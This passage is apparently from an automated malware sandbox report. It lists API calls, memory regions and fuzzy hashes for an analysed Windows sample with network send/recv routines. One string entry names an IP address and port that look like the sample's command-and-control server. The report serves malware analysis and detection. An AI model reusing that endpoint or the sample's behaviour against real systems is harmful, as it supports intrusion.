                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2605973128-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __floor_pentium4.LIBCMT ref: 0377112F
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0377115F
                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03771192
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2605973128-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __floor_pentium4.LIBCMT ref: 02C6112F
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02C6115F
                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02C61192
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2605973128-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03779E04
                                                                                                                                                                      • GdipDisposeImage.GDIPLUS(?), ref: 03779E18
                                                                                                                                                                      • GdipDisposeImage.GDIPLUS(?), ref: 03779E3B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 800915452-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0379FB64), ref: 03779ADC
                                                                                                                                                                      • GdiplusStartup.GDIPLUS(0379FB60,?,?), ref: 03779B15
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0379FB64), ref: 03779B26
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 389129658-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                      • String ID: 118.107.44.219$19091
                                                                                                                                                                      • API String ID: 3472027048-838246116
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd_noexit.LIBCMT ref: 0377F969
                                                                                                                                                                        • Part of subcall function 03783DE2: GetLastError.KERNEL32(00000001,00000000,0377F920,0377F6FC,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76), ref: 03783DE6
                                                                                                                                                                        • Part of subcall function 03783DE2: ___set_flsgetvalue.LIBCMT ref: 03783DF4
                                                                                                                                                                        • Part of subcall function 03783DE2: __calloc_crt.LIBCMT ref: 03783E08
                                                                                                                                                                        • Part of subcall function 03783DE2: DecodePointer.KERNEL32(00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000,00000000,?,03783F06), ref: 03783E22
                                                                                                                                                                        • Part of subcall function 03783DE2: GetCurrentThreadId.KERNEL32 ref: 03783E38
                                                                                                                                                                        • Part of subcall function 03783DE2: SetLastError.KERNEL32(00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000,00000000,?,03783F06), ref: 03783E50
                                                                                                                                                                      • __freeptd.LIBCMT ref: 0377F973
                                                                                                                                                                        • Part of subcall function 03783FA6: TlsGetValue.KERNEL32(?,?,037810F0,00000000,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03783FC7
                                                                                                                                                                        • Part of subcall function 03783FA6: TlsGetValue.KERNEL32(?,?,037810F0,00000000,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03783FD9
                                                                                                                                                                        • Part of subcall function 03783FA6: DecodePointer.KERNEL32(00000000,?,037810F0,00000000,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 03783FEF
                                                                                                                                                                        • Part of subcall function 03783FA6: __freefls@4.LIBCMT ref: 03783FFA
                                                                                                                                                                        • Part of subcall function 03783FA6: TlsSetValue.KERNEL32(00000027,00000000,?,037810F0,00000000,03796278,00000008,03781155,?,?,?,03796298,0000000C,03781210,?), ref: 0378400C
                                                                                                                                                                      • ExitThread.KERNEL32 ref: 0377F97C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4224061863-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd_noexit.LIBCMT ref: 02C6715B
                                                                                                                                                                        • Part of subcall function 02C69896: GetLastError.KERNEL32(00000001,00000000,02C67112,02C66F0C,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F), ref: 02C6989A
                                                                                                                                                                        • Part of subcall function 02C69896: ___set_flsgetvalue.LIBCMT ref: 02C698A8
                                                                                                                                                                        • Part of subcall function 02C69896: __calloc_crt.LIBCMT ref: 02C698BC
                                                                                                                                                                        • Part of subcall function 02C69896: DecodePointer.KERNEL32(00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000,00000000,?,02C699BA), ref: 02C698D6
                                                                                                                                                                        • Part of subcall function 02C69896: GetCurrentThreadId.KERNEL32 ref: 02C698EC
                                                                                                                                                                        • Part of subcall function 02C69896: SetLastError.KERNEL32(00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000,00000000,?,02C699BA), ref: 02C69904
                                                                                                                                                                      • __freeptd.LIBCMT ref: 02C67165
                                                                                                                                                                        • Part of subcall function 02C69A58: TlsGetValue.KERNEL32(?,?,02C67711,00000000,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69A79
                                                                                                                                                                        • Part of subcall function 02C69A58: TlsGetValue.KERNEL32(?,?,02C67711,00000000,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69A8B
                                                                                                                                                                        • Part of subcall function 02C69A58: DecodePointer.KERNEL32(00000000,?,02C67711,00000000,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69AA1
                                                                                                                                                                        • Part of subcall function 02C69A58: __freefls@4.LIBCMT ref: 02C69AAC
                                                                                                                                                                        • Part of subcall function 02C69A58: TlsSetValue.KERNEL32(00000025,00000000,?,02C67711,00000000,02C77B60,00000008,02C67776,?,?,?,02C77B80,0000000C,02C67831,?), ref: 02C69ABE
                                                                                                                                                                      • ExitThread.KERNEL32 ref: 02C6716E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4224061863-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 035F022B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time_memmovetime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1463837790-0
                                                                                                                                                                      • Opcode ID: 8fdd0e42fa778971983f8415cc3cf240560d56fe80e8067dd0294c5d5afc4583
                                                                                                                                                                      • Instruction ID: e81499e784ecd6e7e3df8a6a1217b8043d90441fd39adc0e2248ba5ad8f27c02
                                                                                                                                                                      • Opcode Fuzzy Hash: 8fdd0e42fa778971983f8415cc3cf240560d56fe80e8067dd0294c5d5afc4583
                                                                                                                                                                      • Instruction Fuzzy Hash: B351D27A700205AFEB25DF69C8C4A7AB7A9BF48214758866CE9198B700DB31F851DBD0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time_memmovetime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1463837790-0
                                                                                                                                                                      • Opcode ID: 964d5c23b93ad1fd88f8810c494dbfeff016007414801962d54d6f63d524a06a
                                                                                                                                                                      • Instruction ID: b1a2d83b4ae198b5b19ef9d519d94a52e9db274f8616415e5d935c0489c00e50
                                                                                                                                                                      • Opcode Fuzzy Hash: 964d5c23b93ad1fd88f8810c494dbfeff016007414801962d54d6f63d524a06a
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A5191727002419FD715CF69C8C8A7AFBA6BF8471471886A8D91ADBB04DB31E951CB90
                                                                                                                                                                      APIs
                                                                                                                                                                      • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 03773043
                                                                                                                                                                      • recv.WS2_32(?,?,00040000,00000000), ref: 03773064
                                                                                                                                                                        • Part of subcall function 0377F91B: __getptd_noexit.LIBCMT ref: 0377F91B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexitrecvselect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4248608111-0
                                                                                                                                                                      • Opcode ID: 35d027ef3d27a7907c87b1f59581c5c40052ffe9d4584c391ed9cc9d0efc4a60
                                                                                                                                                                      • Instruction ID: fce64530ebef643d6e26da25074edaa3b3b6920b653cc86c5633dec739d96ff7
                                                                                                                                                                      • Opcode Fuzzy Hash: 35d027ef3d27a7907c87b1f59581c5c40052ffe9d4584c391ed9cc9d0efc4a60
                                                                                                                                                                      • Instruction Fuzzy Hash: CC21807960030CDFEF20EF69DC88B9A77A5EF05310F1845A5E5489F290D7B0A985DBE1
                                                                                                                                                                      APIs
                                                                                                                                                                      • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02C63023
                                                                                                                                                                      • recv.WS2_32(?,?,00040000,00000000), ref: 02C63044
                                                                                                                                                                        • Part of subcall function 02C6710D: __getptd_noexit.LIBCMT ref: 02C6710D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexitrecvselect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4248608111-0
                                                                                                                                                                      • Opcode ID: d6b93dca6c29d064242a30314b8d76a902a3e8752dfc7911044515842cd16b5e
                                                                                                                                                                      • Instruction ID: 941b35982562b007a0720e20197fe37e33bc6ec8d387d2e27fc0bb2aed31c0d6
                                                                                                                                                                      • Opcode Fuzzy Hash: d6b93dca6c29d064242a30314b8d76a902a3e8752dfc7911044515842cd16b5e
                                                                                                                                                                      • Instruction Fuzzy Hash: DE219470A00248DBDB209F68DCCCBBA7775EF45B14F2005E5E5056B190DB70AA88CFA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • send.WS2_32(?,?,00040000,00000000), ref: 03773291
                                                                                                                                                                      • send.WS2_32(?,?,?,00000000), ref: 037732CE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: send
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2809346765-0
                                                                                                                                                                      • Opcode ID: 37255dec2a52a9bbe305b23dda70a38d4b2faf5dde60a8bf125d35fdc9d13d85
                                                                                                                                                                      • Instruction ID: 67d0d2c257361927988ca79cec8dccdd5bdbe8c4e79dde01ab48141354fefec7
                                                                                                                                                                      • Opcode Fuzzy Hash: 37255dec2a52a9bbe305b23dda70a38d4b2faf5dde60a8bf125d35fdc9d13d85
                                                                                                                                                                      • Instruction Fuzzy Hash: F311257AB01304B7EB20CA2ADC89B4AB799FB45260F144135E90CD7280D2319841A294
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: SleepTimetime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 346578373-0
                                                                                                                                                                      • Opcode ID: 6d055f9805eaabbe867f27ee9eacca435e3613f3668d224aef24466d6a48212c
                                                                                                                                                                      • Instruction ID: 78b7173f9dc8e912439b4cdd00b56f287b75264c07d1657f27e1a850fbc0e5ae
                                                                                                                                                                      • Opcode Fuzzy Hash: 6d055f9805eaabbe867f27ee9eacca435e3613f3668d224aef24466d6a48212c
                                                                                                                                                                      • Instruction Fuzzy Hash: 8C01F239200A0ABFEB11DF28C8C8B69F7B9FB99301F184265D1048B680D735A9C6D7D1
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: SleepTimetime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 346578373-0
                                                                                                                                                                      • Opcode ID: d082fb474ebb313fc72161d63944bdeb1d2865c20000a222dde212ebea33bff2
                                                                                                                                                                      • Instruction ID: 79be14d199ba0122bfe72a809659cda838c788076b6c421e60b9b7b1da716001
                                                                                                                                                                      • Opcode Fuzzy Hash: d082fb474ebb313fc72161d63944bdeb1d2865c20000a222dde212ebea33bff2
                                                                                                                                                                      • Instruction Fuzzy Hash: B901DF31A04246AFD710CF29D8C8BBDB3B9FB99745F1442A8D5008B2C0C771AADAC7E1
                                                                                                                                                                      APIs
                                                                                                                                                                      • HeapCreate.KERNEL32(00000004,00000000,00000000,0377E04E,00000000,03779800,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 0377CD1B
                                                                                                                                                                      • _free.LIBCMT ref: 0377CD56
                                                                                                                                                                        • Part of subcall function 03771280: __CxxThrowException@8.LIBCMT ref: 03771290
                                                                                                                                                                        • Part of subcall function 03771280: DeleteCriticalSection.KERNEL32(00000000,0377D3E6,03796624,?,?,0377D3E6,?,?,?,?,03795A40,00000000), ref: 037712A1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1116298128-0
                                                                                                                                                                      • Opcode ID: 33091f0acf424e88166b912c5d2b713733a47861a4ff24006bc4b9e0a6362f71
                                                                                                                                                                      • Instruction ID: ce11d0cc9bf4041513ec6f380d7c1bd94e8ccc28b4f5eeadf086d8492a478306
                                                                                                                                                                      • Opcode Fuzzy Hash: 33091f0acf424e88166b912c5d2b713733a47861a4ff24006bc4b9e0a6362f71
                                                                                                                                                                      • Instruction Fuzzy Hash: 8D017AB0A00B449FC731DF6A9844A07FAE8BF98700B504A2ED2DACAA10D374A106CF55
                                                                                                                                                                      APIs
                                                                                                                                                                      • HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,02C65AF2), ref: 02C6642B
                                                                                                                                                                      • _free.LIBCMT ref: 02C66466
                                                                                                                                                                        • Part of subcall function 02C61280: __CxxThrowException@8.LIBCMT ref: 02C61290
                                                                                                                                                                        • Part of subcall function 02C61280: DeleteCriticalSection.KERNEL32(00000000,?,02C77E78), ref: 02C612A1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1116298128-0
                                                                                                                                                                      • Opcode ID: 69f10b178c29e316d30315dd41d96f4b440d41a5eba0ae3ab2624229b378e726
                                                                                                                                                                      • Instruction ID: 4645c120701d48d9bd9568b6ceca6560b7d0e2f4a88f3b5c50e18c8a04998a11
                                                                                                                                                                      • Opcode Fuzzy Hash: 69f10b178c29e316d30315dd41d96f4b440d41a5eba0ae3ab2624229b378e726
                                                                                                                                                                      • Instruction Fuzzy Hash: 36013EF0A00B409FD720DF6A9884A57FAF9FF98711B104A1ED6DAC7A10D374A145CF95
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0377DF10,00000000,00000000,00000000), ref: 0377E49B
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03781168,?,?,?,?,?,?,03796298,0000000C,03781210,?), ref: 0377E4A9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateObjectSingleThreadWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1891408510-0
                                                                                                                                                                      • Opcode ID: 16af5033599bcb4c7f1846817a4579b82fc56260173746758418cbd1f9205ad0
                                                                                                                                                                      • Instruction ID: c09ab8913bb0f1e06356b0a0c1541686ab956174c40672b45f1bf2682ac5c3e9
                                                                                                                                                                      • Opcode Fuzzy Hash: 16af5033599bcb4c7f1846817a4579b82fc56260173746758418cbd1f9205ad0
                                                                                                                                                                      • Instruction Fuzzy Hash: 6BE05BB054420DBFEF10FB54AC84E3673DCD704330B118757F920D2289D539D851C6A0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 0377F98F
                                                                                                                                                                        • Part of subcall function 03783E5B: __getptd_noexit.LIBCMT ref: 03783E5E
                                                                                                                                                                        • Part of subcall function 03783E5B: __amsg_exit.LIBCMT ref: 03783E6B
                                                                                                                                                                        • Part of subcall function 0377F964: __getptd_noexit.LIBCMT ref: 0377F969
                                                                                                                                                                        • Part of subcall function 0377F964: __freeptd.LIBCMT ref: 0377F973
                                                                                                                                                                        • Part of subcall function 0377F964: ExitThread.KERNEL32 ref: 0377F97C
                                                                                                                                                                      • __XcptFilter.LIBCMT ref: 0377F9B0
                                                                                                                                                                        • Part of subcall function 0378418F: __getptd_noexit.LIBCMT ref: 03784195
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
